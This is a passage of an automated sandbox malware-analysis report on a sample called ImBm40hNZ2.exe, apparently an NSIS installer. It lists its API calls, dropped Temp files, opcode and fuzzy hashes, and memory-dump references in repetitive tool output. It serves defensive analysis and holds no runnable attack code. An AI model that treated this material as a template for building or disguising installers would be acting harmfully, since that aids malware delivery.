                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                                                • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                                                                                                                                                • Instruction ID: 2867520efe4a73b412c28396778f72c18efdc293359581d751bf97dd4c525389
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59D0A962A099302AE21226158C05E8B3A28CF42351B040032F200F22A2CA3C2D428FFE
                                                                                                                                                                                                                                                                Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                                                                                                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                                                                                                                                                                                • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1404258612-0
                                                                                                                                                                                                                                                                • Opcode ID: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
                                                                                                                                                                                                                                                                • Instruction ID: 9073a6d5dd373040739bd7ba49bf73079916e51ed90b12fbca594bab97ee4bd6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51117071A00108BEDB01EFA5DD81DAEBBB9EF04344F20807AF505F21A1D7389E54DB28
                                                                                                                                                                                                                                                                Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402DA5,00000001), ref: 00402BD8
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402BF6
                                                                                                                                                                                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C21
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
                                                                                                                                                                                                                                                                • Instruction ID: 1e461717de66f8227c62b67df7ec3c369d4a9b771999132610b492aaebc5c7f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F05E30A09220AFC6319F20FE4CA9B7BA4F704B52F400876F501F12E4D7B49882DB9C
                                                                                                                                                                                                                                                                Function 00404DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404E1F
                                                                                                                                                                                                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404E70
                                                                                                                                                                                                                                                                  • Part of subcall function 00403ECB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EDD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
                                                                                                                                                                                                                                                                • Instruction ID: 735a5b7f30d8858267acffd8a6d90af7f660f30547e28e970091e6d44494b330
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D01D4B1100208ABDF216F11DC80E5B3B65F7C0755F148037F704762E1C3398C929BAA
                                                                                                                                                                                                                                                                Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll, xrefs: 004024DD, 00402502
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWritelstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll
                                                                                                                                                                                                                                                                • API String ID: 427699356-3675990351
                                                                                                                                                                                                                                                                • Opcode ID: 0d8f7926e3efbfeae62077498417c4e8ed7d546d0ceab61f0b32f3c26c981e43
                                                                                                                                                                                                                                                                • Instruction ID: a883fdd419b2a4eb5493ceda3f40f573e301ba6e05519d4286a6244a7debee73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d8f7926e3efbfeae62077498417c4e8ed7d546d0ceab61f0b32f3c26c981e43
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4F054B2A54244EBDB40EBA19E49AAB7664DB00304F10443BB141F61C2D6BC6941966D
                                                                                                                                                                                                                                                                Function 00405344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B028,Error launching installer), ref: 00405369
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405376
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405357
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                • Opcode ID: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
                                                                                                                                                                                                                                                                • Instruction ID: a3642443da7e6be1e7fb37006141d073ee56f3b6b1647af5c4ef1a74181a0ab0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4E0ECB4A00209ABEB119F64EC09D6B7BBCFB14344B404521A915E2260D778E4188ABD
                                                                                                                                                                                                                                                                Function 00403585 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,756A3410,0040355D,004033A1,?), ref: 0040359F
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(0053DC08), ref: 004035A6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                                                • Opcode ID: 419bff3280ce76e45398024eeeb67ca1fd65b3cfe8a035b33e31a73ff98b0390
                                                                                                                                                                                                                                                                • Instruction ID: 5ca95732a304e18412054ab77c0ab83252b312de05b54ef578a8e1efb138fc3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 419bff3280ce76e45398024eeeb67ca1fd65b3cfe8a035b33e31a73ff98b0390
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAE08C32902520A7C6619F54AD0875AB768AB8CB22F16003BE8007B2A0C7742D428A88
                                                                                                                                                                                                                                                                Function 00405668 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ImBm40hNZ2.exe,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 0040566E
                                                                                                                                                                                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ImBm40hNZ2.exe,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 0040567C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                                                • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                                                                                                                                                                                • Instruction ID: 230f2e7a0103d2b68aac624e7a10235ef3a8e2ce08a567a17c6e9ee09cd0968c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CD0A77280CD702EF30352108C04B9F6A48CF22300F0904A2E040E21D0C67D1C424BED
                                                                                                                                                                                                                                                                Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                                                                                                                                                                                                                  • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Free$Alloclstrcpy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 852173138-0
                                                                                                                                                                                                                                                                • Opcode ID: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
                                                                                                                                                                                                                                                                • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                                                                                                                                                                                                                                Function 00405787 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(004059B6,00000000), ref: 004057AF
                                                                                                                                                                                                                                                                • CharNextA.USER32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                • Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                                                                                                                                                                                                                • Instruction ID: 879ea975532de9619441bb2369f95f9e0e18c5552eb9cc1946a4235f5f50821d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6F0C235604558FFC7129BA4DD4099EBBB8EF56350F2100AAF900F7211D274EE01ABAA

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:0%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                                                                                                Total number of Nodes:1
                                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                execution_graph 59346 33942b90 LdrInitializeThunk

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 339434E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
